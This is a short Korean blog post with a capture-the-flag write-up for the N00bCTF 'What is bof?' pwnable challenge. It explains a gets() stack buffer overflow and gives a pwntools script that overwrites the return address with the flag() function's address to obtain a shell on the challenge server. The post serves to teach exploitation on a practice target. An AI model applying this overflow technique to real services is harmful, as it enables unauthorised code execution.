ii4gsp
N00bCTF - What is bof? 본문
파일을 다운받아 주자.
파일을 IDA로 열어보면 gets()함수에서 취약점이 발생한다는것을 알 수 있다.
s는 0x14 즉, 10진수로 20만큼 할당되었고 sfp까지하면 24byte이다.
s ~ sfp 만큼 24byte를 덮어주고 ret를 flag() 함수의 주소로 조작하면 쉘을 획득할 수 있다.
flag()함수의 주소는 0x08048516 이다.
Exploit
from pwn import *
r = remote('52.79.224.215', 30005)
payload = ''
payload += '\x90' * 24
payload += p32(0x08048516)
r.recvuntil('>> ')
r.sendline(payload)
r.interactive()
'시스템 해킹 > N00bCTF - Pwnable' 카테고리의 다른 글
N00bCTF - Over the RET (0) | 2020.02.10 |
---|---|
N00bCTF - very ezzzzzz!! (0) | 2020.02.10 |
Comments